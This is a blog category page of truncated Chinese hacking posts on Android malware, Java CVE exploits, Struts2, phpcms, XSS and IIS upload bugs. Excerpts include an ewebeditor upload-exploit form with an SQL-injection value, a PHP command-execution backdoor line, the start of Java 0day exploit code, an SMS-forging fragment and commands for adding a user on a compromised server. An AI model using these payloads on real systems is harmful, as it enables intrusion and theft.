hacker
文章平均质量分 66
wcf1987
这个作者很懒,什么都没留下…
展开
-
metasploit 图形化界面和自动化exploit脚本
0x01 最新版的metasploit没了图形化界面, armitage开始收费 那我们就选用msfgui吧,安装简单 https://raw.github.com/scriptjunkie/msfgui/master/msfgui-installer.exe 下载安装就可以了...原创 2013-10-21 16:25:46 · 1696 阅读 · 0 评论 -
A new way to hack android app info
最近新研究了一种android攻击手段,blog发到团队那里的blog了,这里就给个链接和ppt下载吧 写道http://insight-labs.org/?p=587 效果截图和评价 利用对输入法的重打包,来实现窃取用户信息的方式,优点在于权限要求非常之低,只要求一个网络权限就可以窃取各种各样的用户输入信息了,而反观各种输入法他们自身申请的权限已经非常之高了。而且窃...原创 2012-11-06 01:04:18 · 155 阅读 · 0 评论 -
XSS学习二
1.xss学习到今天算是告一个段落了,发现了一个sohu邮箱的持久性XSS,可做后门危害还是大的,而且对sohu邮箱的整个体系也有了一定的研究,算是小有成就的http://www.wooyun.org/bugs/wooyun-2012-010385 2, 明天起继续搞android,并且准备找工作... ...原创 2012-07-31 15:48:39 · 84 阅读 · 0 评论 -
我的sinaapp
我的sinapp小家终于成型了http://icefish1987.sinaapp.com/ 截两张图 看看原创 2012-07-27 22:10:20 · 180 阅读 · 0 评论 -
android恶意程序分析 (三)
写道83c4aa1deb06060db6fae4e13630ed18c6ebe6babc187443b5f4c265c2ee074f 分析报告 1.这个是 2. AndroidManifest.xml <?xml version="1.0" encoding="utf-8"?> <manifest android:versionCode="1" android:version...原创 2012-04-09 16:30:37 · 256 阅读 · 0 评论 -
phpcms v9的补充
前一篇留了个疑问:为什么file_get_contents(asdf&q=../../phpsso_server/caches/configs/database.php)可以读出文件呢, 他前面那个asdf&q=为什么没影响? 后来经过bacde大牛的指点: 写道前面的字符可以看成是一个文件夹名字 忽然间反应了过来,那么路径实际上就变成...原创 2012-07-25 21:28:55 · 109 阅读 · 0 评论 -
phpcms v9 爆密码
1.首先是http://www.wooyun.org/bugs/wooyun-2010-010072 有人报告phpcms v9 直接爆密码 开始我还比较迷惑,因为我记得我看过phpcms v9 的管理员密码体系是有salt的,光爆密码没啥用啊? 2.后面有人指出了是和前一个http://www.wooyun.org/bugs/wooyun-2010-09...原创 2012-07-25 20:47:02 · 494 阅读 · 0 评论 -
xss漏洞及其他-学习笔记
http://www.wooyun.org/bugs/wooyun-2010-010041这是今天忙活了下的结果。发现了个比较鸡肋的反射型xss 另外还学习了sina app的应用,果然比较爽,各种自己的js文件,在线编辑,非常方便。 此外下次blog的任务是http://www.inbreak.net/archives/389空虚浪子心的blog非常cool ...原创 2012-07-23 17:05:19 · 90 阅读 · 0 评论 -
android恶意程序分析 (二)
http://bbs.pediy.com/showthread.php?t=148757这是我的分析报告, 写道Android_FakeToken.A_infected_分析报告 1. AndroidManifest.xml分析 <?xml version="1.0" encoding="utf-8"?> <manifest xmlns:android="http...原创 2012-03-31 14:53:08 · 165 阅读 · 0 评论 -
android恶意程序分析 (一)
决定了毕设做android安全方向的相关内容,那么每天一篇android恶意软件分析是少不了。今天就是第一篇首先介绍个网站http://contagiominidump.blogspot.com/非常好的一个网站,主要是他隔三差五的会放出个android恶意软件,我的分析就是基于他给出的apk文件。注意要FQ android.dds.com-STiNiTER...原创 2012-03-29 21:12:03 · 715 阅读 · 0 评论 -
CVE-2013-1493 学习
0x01 这个又是一个java CVE,效果前几个一样,可以用来关闭SecurityManager,poc我找了好久好久,整合了下,经过测试在xp+jdk6下成功,win7+jdk7失败,原因不详。 这个poc的技术感觉是采用了漏洞溢出的原理,然后对一大片地址进行了喷射,然后强制置位,从而关掉了 SecurityManager,大家有什么见解可以聊聊。 0x02 这个p...原创 2013-03-25 16:06:34 · 253 阅读 · 0 评论 -
最近接触的几个技术随笔
1.IIS短文件和文件夹泄漏漏洞 这个漏洞具体可以看核攻击大牛的blog:http://lcx.cc/?i=2643 我大概谈谈我的理解吧,由于历史遗留问题,在windows系统中会对长度超过8个字母的文件夹和后缀超过3个时,会生成一个对应的8.3格式的短文件,而这个文件则是可以通过*和~来进行通配预测的,具体类似于sql盲注, 有人写了个java板的利用工具,但是实...原创 2012-07-13 14:04:31 · 89 阅读 · 0 评论 -
android 无权限 伪造短信
0x01 这个有是大名鼎鼎的蒋教授发现的,原理简单,有点意思 0x02 代码实现package com.smstrick;import java.io.ByteArrayOutputStream;import java.io.IOException;import java.lang.reflect.Method;import java.util.Calenda...原创 2012-11-06 09:15:54 · 359 阅读 · 0 评论 -
android恶意程序分析 (四)
这次分析的依然是opfake的一个变种,但实际分析下来,感觉这个不太像,内容也是比较怪异的。亮点不多 写道Opfake 另一个变种? 1. AndroidManifest.xml <?xml version="1.0" encoding="utf-8"?> <manifest android:versionCode="1" android:versionName=...原创 2012-04-13 21:29:06 · 203 阅读 · 0 评论 -
APKTool签名的一个问题
0x01 昨天写了反编译,今天就写下签名的问题 0x02 apktool的重打包功能大家都知道,堪称神器,各类破解人事必备之良器, 用法不多说,只说签名容易遇到的问题0x03 创建私钥仓库这个事情就不多说,方法很多,eclipse和keytool 都有类似功能 需要注意的是,这个私钥仓库一共有两个密码,一个是私钥仓库的密码(stor...原创 2013-10-14 21:19:15 · 725 阅读 · 0 评论 -
APKTool打包的一个小问题
0x01,又开始写blog了,好久没有网络了,最近终于可以开始继续研究技术了。 今天的问题是大家再用到APKTool时估计常见的一个问题, 在windows下,用APKTool进行打包时,有时会爆这个错误,甚至我们在反编译完没经过任何改动的时候,直接重打包也会遇到 I: Smaling...I: Building reso...原创 2013-10-13 20:23:24 · 378 阅读 · 0 评论 -
一次被黑追凶(未完待续)
0x01,某天师妹告诉我们某台服务器疑似被人干掉了,我果断远程过去,结果服务器远程不上,感觉有点意思了 第二天到实验室,果断直接物理登录,发现服务器出现了奇怪的情况,没了任务管理器,无法直接关机。 远程端口疑似被改, 首先写道netstat -ano > e:/test.txt 得到部分链接如下 写道...原创 2012-10-15 19:52:01 · 162 阅读 · 0 评论 -
CVE-2013-0422 分析2
0x01http://wcf1987.iteye.com/blog/1749088 这是对CVE-2012-0507的分析http://wcf1987.iteye.com/blog/1768355这是对CVE-2013-0422的分析本文则是java的cve-2013-0422的分析,其实看poc感觉上就跟CVE-2012-0507有几分相似的地方,都是最终利用了definecl...原创 2013-01-11 23:47:33 · 576 阅读 · 0 评论 -
CVE-2013-0422 学习
0x01 这个是这两天爆出来的,我构建了一个本地测试代码,主要用来研究,测试方法,直接跑就可以看输出就可以看懂了,具体分析代码见后文 0x02 package test;/*Java 0day 1.7.0_10 decrypted sourceOriginaly placed on https://damagelab.org/index.php?showtopic=2371...原创 2013-01-11 16:26:53 · 277 阅读 · 0 评论 -
python 反编译 pyc 一些心得
0x01 , 现在用python的人也多了起来,代码安全始终是我们要考虑的问题,比如说我们要将我们的成果发布出去,py直接发布肯定是不行的(除非你是开源的),那么我们就只能考虑发布pyc文件了, 0x02,今天讨论的就是怎么反编译pyc到源代码的技术,从道理上来讲,这个是完全没问题的,而且反编译出来的代码质量应该相当高才对(参考java class的原理),在百度里面搜索的话,信息量...原创 2012-09-06 10:59:14 · 2897 阅读 · 0 评论 -
CVE 2012 0507 分析
0x01 https://github.com/wchen-r7/metasploit-framework/blob/791ebdb679d53f6363cf88a54db57722719cd62a/external/source/exploits/CVE-2012-0507/Exploit.java 这里就是java的cve 2012 0507的poc所在了,大部分网上流传的基本上...原创 2012-12-17 16:00:43 · 686 阅读 · 0 评论 -
struts2远程执行漏洞学习(四)
0x01 最近又有了一个新的struts2漏洞,http://www.inbreak.net/archives/487 空虚浪客心调试了下并验证了,漏洞的原始链接地址,不过没有细节,看不到。 0x02 如果大家指望这个洞和以前那些struts2的漏洞一样给力,那就准备失望吧。这个洞根据我的研究,我觉得利用方式很简单,但是想找到符合条件的漏洞点很难。 0x03 目测这个洞的激活关...原创 2013-05-23 00:12:37 · 176 阅读 · 0 评论 -
关于web渗透中得一些记录
1. 当得到linux root shell时,采用如下语句可以添加管理员帐户 写道useradd icefish //添加icefish用户passwd icefish //设置密码awk -F: '{print $1}' /etc/passwd 可以查看有多少用户不过刚建立的账户都是被锁状态需要解锁usermod -U icefish或者usermod -u uidusermod ...原创 2012-08-24 23:31:15 · 240 阅读 · 0 评论 -
mail xss
1 最近迷上了xss,感觉各种飘逸,特别是http://www.wooyun.org/whitehats/gainover的文章都非常好 2 然后去搞自己学校的邮箱,凭感觉应该不难,结果尝试了img 的各种方法失败,script标签变形失败,flash和object这种也不行,变形的还是蛮厉害的 3但是 xss:expression 这种还是中了,感觉这种的变形是最多的,各种绕,...原创 2012-08-11 21:57:36 · 190 阅读 · 0 评论 -
android的一款整合jad,apktool,dex2jar的脚本
#! /usr/bin/env python#coding=utf-8import osimport subprocessimport timeimport shutil,sysimport zipfile apksrc="C:\\test\\test.apk"apkdest=""copyzip=""dex2dir=""jadsrc=""...原创 2012-04-16 14:41:35 · 174 阅读 · 0 评论 -
<转载>一个官方没有公布的php秘籍,可用作后门
可以看看http://www.webshell.cc/3303.html好奇怪的漏洞?可以当做个小马使用,比较有意思的一个东西写道被过滤广告 发现这个也是巧合,我就直接说了吧 <?php //t.php $test = $_GET['r']; echo `$test`; ?>大家看看这个代码有木有问题? 这里是我们自己的交流平台,是属于我们90sec所有成员的技术分...原创 2012-03-05 15:02:53 · 76 阅读 · 0 评论 -
python中利用twisted的异步通信和微线程 实现webshell密码扫描器
好久没写blog了,到了暑假时间充裕了,打算好好写几篇, ps:最近blog访问量大了不少,一看全是去看struts2漏洞的... 好久以来都一直想学习windows中得iocp技术,即异步通信,但是经过长时间研究别人的c++版本,发现过于深奥了,有点吃力,不过幸好python中的twisted技术的存在方便了我。 iocp即异步通信技术,是wi...原创 2012-07-06 19:06:13 · 157 阅读 · 0 评论 -
struts2远程执行漏洞学习(三)
这个是终结部分了。 除了#_memberAccess.allowStaticMethodAccess'是一个关键属性外,'xwork.MethodAccessor.denyMethodExecution’是另一个关键属性,意义如同名字,这个属性决定了是否可以执行方法,只有当这个属性为false时,我们才可以利用ognl自定义变量,调用一些关键的方法 例如FileWrite...原创 2012-02-24 16:27:09 · 216 阅读 · 0 评论 -
windows远程超最大连接数
强制远程连接,超过最大连接数。mstsc /console /v:192.168.66.133:3389mstsc /v:192.168.66.133:3389 /console/admin原创 2011-11-01 12:32:01 · 222 阅读 · 0 评论 -
ewebeditor上传漏洞
<H3>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H3><br><br><form action="http://xxxx/include/wedit/upload.asp?action=save&type=IMAGE&style=standard' and 1=2 union select S...原创 2011-10-10 17:32:59 · 669 阅读 · 0 评论 -
一个自定义扫描web程序源代码的工具
import sysimport getoptimport osimport redef replace(dir,regex): p = re.compile(regex) WalkDir(dir,p)def replacemore(dir,regex,regex2): p = re.compile(regex) p2 = re....原创 2011-09-28 21:54:15 · 245 阅读 · 0 评论 -
phpcms2008漏洞
下面是官方到目前为止还没有打补丁的几个漏洞http://www.tmdsb.com/flash_upload.php?modelid=1注入漏洞<?phprequire dirname(__FILE__).'/include/common.inc.php';if($PHPSESSID) { session_id($PHPSESSID); session_sta...原创 2011-09-28 16:25:29 · 139 阅读 · 0 评论 -
phpspy2010 绕过登陆漏洞解析
phpspy2010可谓是webshell界很不错的一个工具,但是phpspy2010 和2011相继爆出了绕过认证漏洞,我简单分析下php2010的绕过漏洞,首先据说只有php2010的加密版才有这个漏洞,我大概看了下官方解释,估计也只有加密版才有这个问题,而且看上去应该是个失误。。。 下面具体分析:附件是2010的源代码,由于是加密的eval执行base64解密,把e...原创 2011-09-25 15:47:45 · 482 阅读 · 0 评论 -
IIS 6.0 解析漏洞的一些用法(二)
这个漏洞的危害非常严重,我目前看到的比较多的应用有几个 1 。 数据库备份上得使用,很多信息管理系统,cms,网城等等,在拿到了管理员账户后,需要上传木马时,很多地方都限制了asp或者asa的上传,这时采用上传一个a.jpg,然后在备份的时候备份为../a.asp/b.mdb,因为在很多情况下数据库备份都会做限制,不允许自定义备份后缀名,但是你可以自定义备份路径,从而构成a.asp这种...原创 2011-09-15 16:42:49 · 175 阅读 · 0 评论 -
IIS6.0 安装及解析漏洞
最近在看到一篇帖子时候,发现竟然上传的是jpg木马,一时没有想通原理,iis服务器怎么可能把jpg文件当做asp文件执行呢,结果网上百度后发现,这时iis的一个长期漏洞,那么回头再看,很多网站的上传过滤就很有问题了,只过滤后缀名的话估计就会有问题 具体有两个大的解析漏洞 1 如果iis目录下面存在类似*.asp,*.asa之类的目录,那么该目录下面的所有文件将...原创 2011-09-14 17:30:56 · 179 阅读 · 0 评论 -
sqlmap学习笔记(二)
上篇讲到了payload.xml,这篇就详细说下payload.xml帮助 写道<!-- Tag: <boundary> How to prepend and append to the test ' <payload><comment> ' string. Sub-tag: <level> From which level ...原创 2011-09-08 17:19:07 · 173 阅读 · 0 评论 -
sqlmap学习指南(一)
sqlmap是一款开源的sql注入工具,比起国内的很多工具来说,他最大的优点就是开源,你可以根据自己的注入经验改造这一款软件,而且他提供注入的细节输出,比如注入所使用的sql,变形后的sql,request,response细节,并且支持几乎目前所有的常见数据库,及注入手段(get,post,cookie),而且对页面的抓取也比较给力,盲注什么的更不在话下。优点多多。对中国人来说问题只...原创 2011-09-08 16:04:49 · 241 阅读 · 0 评论 -
cookie中转sql攻击
最近带了个实习生做了个sql注入练习,她找到了个asp网站的cooki注入漏洞,这个也是目前sql注入比较多见的地方,因为大部分网站在得到request的时候采用的都是request("xx"),这个方法实际上是把request中的get,post,cookie挨个遍历查询了下,目前大部分sql注入防御软件都封掉了get,post这两个漏洞,但是却对cookie视而不见。这个也是比较长...原创 2011-08-24 00:45:21 · 88 阅读 · 0 评论 -
又搞定了一道,做个记录
通用 jmp esp 在xp 2000 win70x7ffa4512通用pop pop ret0x7f5a1571通用call ebx0x7ffa1571原创 2011-05-14 00:18:12 · 125 阅读 · 0 评论 -
ewebeditor 3.8 任意文件上传漏洞解析
首先这个是别人早都发出来的一个漏洞,exp也写好了,如下<title>eWebeditoR3.8 for php任意文件上EXP</title><form action="" method=post enctype="multipart/form-data"> <INPUT TYPE="hidden" name="MAX_F原创 2011-11-09 19:55:13 · 1188 阅读 · 0 评论